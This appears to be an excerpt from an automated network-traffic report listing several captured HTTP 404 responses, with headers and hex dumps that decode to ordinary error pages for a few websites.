            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=UTF-8Server: Microsoft-IIS/7.5X-Powered-By: PHP/7.4.6Date: Thu, 04 Jul 2024 10:37:07 GMTConnection: closeContent-Length: 1611Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 77 77 2e 70 69 71 69 61 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4d 69 63 72 6f 73 6f 66 74 20 59 61 68 65 69 22 2c 20 e5 be ae e8 bd af e9 9b 85 e9 bb 91 2c 20 54 61 68 6f 6d 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 20 47 42 2c 53 65 67 6f 65 20 55 49 22 2c 20 41 72 69 61 6c 2c 20 53 54 48 65 69 74 69 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0d 0a 2e 74 6f 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 36 36 63 63 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 41 2e 6c 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 36 66 36 66 36 66 7d 0d 0a 41 2e 75 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 67 72 65 65 6e 7d 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 0d 0a 75 6c 7b 6d 61 72 67 69 6e 3a 31 65 6d 3b 7d 0d 0a 23 6d 65 6e 75 7a 61 66 64 37 63 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 70 78 3b 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 39 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 65 66 65 66 65 66 3b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 30 70 78 3b 7d 0d 0a 23 6d 65 6e 75 7a 61 66 64 37 63 20 61 2c 23 73 65 72 76 65 72 20 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0d 0a 2e 6f 6c 7a 61 66 64 37 63 20 6c 69 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 7d 0d 0a 61 7b 63 6f 6c 6f 72 3a 23 30 30 66 3b 7d 0d 0a 2e 63 6f 70 79 72 69 67 68 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 2d 35 30 30 70 78 3b 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 22 3e 3c 62 3e 77 77 77 2e 70 69 71 69 61 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=UTF-8Server: Microsoft-IIS/7.5X-Powered-By: PHP/7.4.6Date: Thu, 04 Jul 2024 10:37:07 GMTConnection: closeContent-Length: 1611Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 77 77 2e 70 69 71 69 61 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4d 69 63 72 6f 73 6f 66 74 20 59 61 68 65 69 22 2c 20 e5 be ae e8 bd af e9 9b 85 e9 bb 91 2c 20 54 61 68 6f 6d 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 20 47 42 2c 53 65 67 6f 65 20 55 49 22 2c 20 41 72 69 61 6c 2c 20 53 54 48 65 69 74 69 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0d 0a 2e 74 6f 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 36 36 63 63 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 41 2e 6c 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 36 66 36 66 36 66 7d 0d 0a 41 2e 75 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 67 72 65 65 6e 7d 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 0d 0a 75 6c 7b 6d 61 72 67 69 6e 3a 31 65 6d 3b 7d 0d 0a 23 6d 65 6e 75 7a 61 66 64 37 63 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 70 78 3b 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 39 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 65 66 65 66 65 66 3b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 30 70 78 3b 7d 0d 0a 23 6d 65 6e 75 7a 61 66 64 37 63 20 61 2c 23 73 65 72 76 65 72 20 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0d 0a 2e 6f 6c 7a 61 66 64 37 63 20 6c 69 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 7d 0d 0a 61 7b 63 6f 6c 6f 72 3a 23 30 30 66 3b 7d 0d 0a 2e 63 6f 70 79 72 69 67 68 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 2d 35 30 30 70 78 3b 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 22 3e 3c 62 3e 77 77 77 2e 70 69 71 69 61 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=UTF-8Server: Microsoft-IIS/7.5X-Powered-By: PHP/7.4.6Date: Thu, 04 Jul 2024 10:37:12 GMTConnection: closeContent-Length: 1611Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 77 77 2e 70 69 71 69 61 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4d 69 63 72 6f 73 6f 66 74 20 59 61 68 65 69 22 2c 20 e5 be ae e8 bd af e9 9b 85 e9 bb 91 2c 20 54 61 68 6f 6d 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 20 47 42 2c 53 65 67 6f 65 20 55 49 22 2c 20 41 72 69 61 6c 2c 20 53 54 48 65 69 74 69 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0d 0a 2e 74 6f 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 36 36 63 63 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 41 2e 6c 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 36 66 36 66 36 66 7d 0d 0a 41 2e 75 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 67 72 65 65 6e 7d 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 0d 0a 75 6c 7b 6d 61 72 67 69 6e 3a 31 65 6d 3b 7d 0d 0a 23 6d 65 6e 75 7a 61 66 64 37 63 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 70 78 3b 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 39 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 65 66 65 66 65 66 3b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 30 70 78 3b 7d 0d 0a 23 6d 65 6e 75 7a 61 66 64 37 63 20 61 2c 23 73 65 72 76 65 72 20 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0d 0a 2e 6f 6c 7a 61 66 64 37 63 20 6c 69 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 7d 0d 0a 61 7b 63 6f 6c 6f 72 3a 23 30 30 66 3b 7d 0d 0a 2e 63 6f 70 79 72 69 67 68 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 2d 35 30 30 70 78 3b 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 22 3e 3c 62 3e 77 77 77 2e 70 69 71 69 61 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 10:37:28 GMTServer: ApacheContent-Length: 1414Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 79 74 64 34 69 6e 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 74 72 79 7b 54 79 70 65 6b 69 74 2e 6c 6f 61 64 28 7b 20 61 73 79 6e 63 3a 20 74 72 75 65 20 7d 29 3b 7d 63 61 74 63 68 28 65 29 7b 7d 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 34 30 34 26 6e 62 73 70 3b 65 72 72 6f 72 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 70 61 67 65 26 6e 62 73 70 3b 6e 6f 74 26 6e 62 73 70 3b 66 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 76 69 65 77 42 6f 78 3d 27 30 20 30 20 32 30 30 20 36 30 30 27 3e 0a 20 20 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 27 31 31 38 2e 33 30 32 36 39 38 20 38 20 35 39 2e 35 33 36 39 34 34 38 20 36 36 2e 37 36 35 37 35 32 38 20 31 38 36 2e 34 38 37 30 31 36 20 31 39 33 2e 37 31 35 38 32 34 20 31 34 20 33 36 36 2e 32 30 32 38 33 39 20 31 35 33 2e 34 39 31 35 30 35 20 35 30 35 2e 36 39 34 33 34 34 20 36 38 2e 31 34 31 33 33 35 33 20 35 39 31 2e 30 34 34 35 31 34 20 32 30 30 20 35 39 31 2e 30 34 34 35 31 34 20 32 30 30 20 38 27 3e 3c 2f 70 6f 6c 79 67 6f 6e 3e 0a 20 20 20 20 3c 2f 73 76 67 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 76 67 20 63 6c 61 73 73 3d 27 63 72 61 63 6b 27 20 76 69 65 77 42 6f 78 3d 27 30 20 30 20 32 30 30 20 36 30 30 27 3e 0a 20 20 20 20 3c 70 6f 6c 79 6c 69 6e 65 20 70 6f 69 6e 74 73 3d 27 31 31 38 2e 33 30 32 36 39 38 20 38 20 35 39 2e 35 33 36 39 34 34 38 20 36 36 2e 37 36 35 37 35 32 38 20 31 38 36 2e 34 38 37 30 31 36 20 31 39 33 2e 37 31 35 38 32 34 20 31 34 20 33 36 36 2e 32 30 32 38 33 39 20 31 35 33 2e 34 39 31 35 30 35 20 35 30 35 2e 36 39 34 33 34 34 20 36 38 2e 31 34 31 33 33 35 33 20 35 39 31 2e 30 34 34 35 31 34 27 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 0a 20 20 3c 2f 73 76 67
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 10:37:31 GMTServer: ApacheContent-Length: 1414Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 79 74 64 34 69 6e 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 74 72 79 7b 54 79 70 65 6b 69 74 2e 6c 6f 61 64 28 7b 20 61 73 79 6e 63 3a 20 74 72 75 65 20 7d 29 3b 7d 63 61 74 63 68 28 65 29 7b 7d 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 34 30 34 26 6e 62 73 70 3b 65 72 72 6f 72 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 70 61 67 65 26 6e 62 73 70 3b 6e 6f 74 26 6e 62 73 70 3b 66 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 76 69 65 77 42 6f 78 3d 27 30 20 30 20 32 30 30 20 36 30 30 27 3e 0a 20 20 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 27 31 31 38 2e 33 30 32 36 39 38 20 38 20 35 39 2e 35 33 36 39 34 34 38 20 36 36 2e 37 36 35 37 35 32 38 20 31 38 36 2e 34 38 37 30 31 36 20 31 39 33 2e 37 31 35 38 32 34 20 31 34 20 33 36 36 2e 32 30 32 38 33 39 20 31 35 33 2e 34 39 31 35 30 35 20 35 30 35 2e 36 39 34 33 34 34 20 36 38 2e 31 34 31 33 33 35 33 20 35 39 31 2e 30 34 34 35 31 34 20 32 30 30 20 35 39 31 2e 30 34 34 35 31 34 20 32 30 30 20 38 27 3e 3c 2f 70 6f 6c 79 67 6f 6e 3e 0a 20 20 20 20 3c 2f 73 76 67 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 76 67 20 63 6c 61 73 73 3d 27 63 72 61 63 6b 27 20 76 69 65 77 42 6f 78 3d 27 30 20 30 20 32 30 30 20 36 30 30 27 3e 0a 20 20 20 20 3c 70 6f 6c 79 6c 69 6e 65 20 70 6f 69 6e 74 73 3d 27 31 31 38 2e 33 30 32 36 39 38 20 38 20 35 39 2e 35 33 36 39 34 34 38 20 36 36 2e 37 36 35 37 35 32 38 20 31 38 36 2e 34 38 37 30 31 36 20 31 39 33 2e 37 31 35 38 32 34 20 31 34 20 33 36 36 2e 32 30 32 38 33 39 20 31 35 33 2e 34 39 31 35 30 35 20 35 30 35 2e 36 39 34 33 34 34 20 36 38 2e 31 34 31 33 33 35 33 20 35 39 31 2e 30 34 34 35 31 34 27 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 0a 20 20 3c 2f 73 76 67
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 10:37:47 GMTServer: ApacheAccess-Control-Allow-Headers: content-type,cache-control,x-requested-with,x-request-auth,x-request-preflight-ews,authorization,x-request-id,ews-deviceid,ews-token,ews-apikey,ews-devicenameExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: flexmarkx_x5_sess_id=59sfsk5vb61o8dvihsk4a1tq01; path=/; HttpOnlyUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipX-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'self' *.enagic.mobi *.enagic.com *.enagic.ca *.enagiceu.com *.enagicwebsystem.com 10.0.2.20:3003 localhostContent-Length: 1115Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b5 56 61 6f db 36 10 fd 5c ff 8a 0b 83 0d 09 16 4b b2 1b 04 85 2d 19 48 5d a7 c9 90 c4 59 a6 b4 eb a7 81 12 69 89 0d 2d aa 24 65 c7 0b fa df 77 a4 9c d4 c6 92 a1 2b 32 19 30 25 ea f8 ee ee f1 dd 51 f1 ce bb e9 38 fd 74 35 81 d3 f4 e2 1c ae 6e de 9e 9f 8d 81 74 c3 f0 e3 eb 71 18 be 4b df b5 2f 0e 83 a8 07 a9 a6 95 11 56 a8 8a ca 30 9c 5c 92 0e 29 ad ad 07 61 b8 5c 2e 83 e5 eb 40 e9 22 4c af c3 d2 ce e5 61 28 95 32 3c 60 96 91 51 27 76 53 6e e0 94 e1 30 e7 96 82 5b da e5 5f 1a b1 48 c8 58 55 96 57 b6 9b ae 6a 4e 20 6f 9f 12 62 f9 9d f5 68 43 c8 4b aa 0d b7 49 63 67 dd 37 0e f1 62 92 1e c3 e5 f1 c5 24 21 d7 d3 b7 d3 f4 77 02 e3 e9 65 3a b9 4c 13 72 39 bd 9c 3c da 9c a6 e9 55 77 f2 db cd d9 87 84 5c 5d 1f bf bf 38 de b2 ec 8e 8f c7 a7 4f 5b fb 37 5d 67 7b 3d 3d ff de 45 93 3f ae ce ae 27 9b d1 5c a8 ea 00 fa 7d f8 b5 91 d0 8f a2 3e f4 7a 83 5e 7f 80 84 be bf 48 11 a3 13 5b 61 25 1f 9d 4c 6f ae 61 7a 0a 6e dc 81 bd c3 e8 70 3f 0e db 57 9d d8 d8 95 e4 60 91 9f 35 2d b9 31 b8 36 53 6c 75 e0 18 82 fb a5 60 b6 1c 40 2f 8a 7e 1a c2 9c ea 42 54 03 88 86 50 53 c6 44 55 b8 fb af 9d 38 f4 40 08 18 b6 7b d1 89 1d 84 73 90 6b 51 db 4d 0f 9f e9 82 b6 b3 e8 48 cc 60 8f a9 bc 99 e3 c6 04 6e c9 7e e7 be f3 6a 6b Data Ascii: Vao6\K-H]Yi-$ew+20%Q8t5ntqK/V0\)a\.@"La(2<`Q'vSn0[_HXUWjN obhCKIcg7b$!we:Lr9<Uw\]8O[7]g{==E?'\}>z^H[a%Loaznp?W`5-16Slu`@/~BTPSDU8@{skQMH`n~jk
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 10:37:52 GMTServer: ApacheAccess-Control-Allow-Headers: content-type,cache-control,x-requested-with,x-request-auth,x-request-preflight-ews,authorization,x-request-id,ews-deviceid,ews-token,ews-apikey,ews-devicenameExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: flexmarkx_x5_sess_id=rttvo4em4t1k4snuk62mngh6c6; path=/; HttpOnlyUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipX-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'self' *.enagic.mobi *.enagic.com *.enagic.ca *.enagiceu.com *.enagicwebsystem.com 10.0.2.20:3003 localhostContent-Length: 1115Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b5 56 61 6f db 36 10 fd 5c ff 8a 0b 83 0d 09 16 4b b2 1b 04 85 2d 19 48 5d a7 c9 90 c4 59 a6 b4 eb a7 81 12 69 89 0d 2d aa 24 65 c7 0b fa df 77 a4 9c d4 c6 92 a1 2b 32 19 30 25 ea f8 ee ee f1 dd 51 f1 ce bb e9 38 fd 74 35 81 d3 f4 e2 1c ae 6e de 9e 9f 8d 81 74 c3 f0 e3 eb 71 18 be 4b df b5 2f 0e 83 a8 07 a9 a6 95 11 56 a8 8a ca 30 9c 5c 92 0e 29 ad ad 07 61 b8 5c 2e 83 e5 eb 40 e9 22 4c af c3 d2 ce e5 61 28 95 32 3c 60 96 91 51 27 76 53 6e e0 94 e1 30 e7 96 82 5b da e5 5f 1a b1 48 c8 58 55 96 57 b6 9b ae 6a 4e 20 6f 9f 12 62 f9 9d f5 68 43 c8 4b aa 0d b7 49 63 67 dd 37 0e f1 62 92 1e c3 e5 f1 c5 24 21 d7 d3 b7 d3 f4 77 02 e3 e9 65 3a b9 4c 13 72 39 bd 9c 3c da 9c a6 e9 55 77 f2 db cd d9 87 84 5c 5d 1f bf bf 38 de b2 ec 8e 8f c7 a7 4f 5b fb 37 5d 67 7b 3d 3d ff de 45 93 3f ae ce ae 27 9b d1 5c a8 ea 00 fa 7d f8 b5 91 d0 8f a2 3e f4 7a 83 5e 7f 80 84 be bf 48 11 a3 13 5b 61 25 1f 9d 4c 6f ae 61 7a 0a 6e dc 81 bd c3 e8 70 3f 0e db 57 9d d8 d8 95 e4 60 91 9f 35 2d b9 31 b8 36 53 6c 75 e0 18 82 fb a5 60 b6 1c 40 2f 8a 7e 1a c2 9c ea 42 54 03 88 86 50 53 c6 44 55 b8 fb af 9d 38 f4 40 08 18 b6 7b d1 89 1d 84 73 90 6b 51 db 4d 0f 9f e9 82 b6 b3 e8 48 cc 60 8f a9 bc 99 e3 c6 04 6e c9 7e e7 be f3 6a 6b Data Ascii: Vao6\K-H]Yi-$ew+20%Q8t5ntqK/V0\)a\.@"La(2<`Q'vSn0[_HXUWjN obhCKIcg7b$!we:Lr9<Uw\]8O[7]g{==E?'\}>z^H[a%Loaznp?W`5-16Slu`@/~BTPSDU8@{skQMH`n~jk
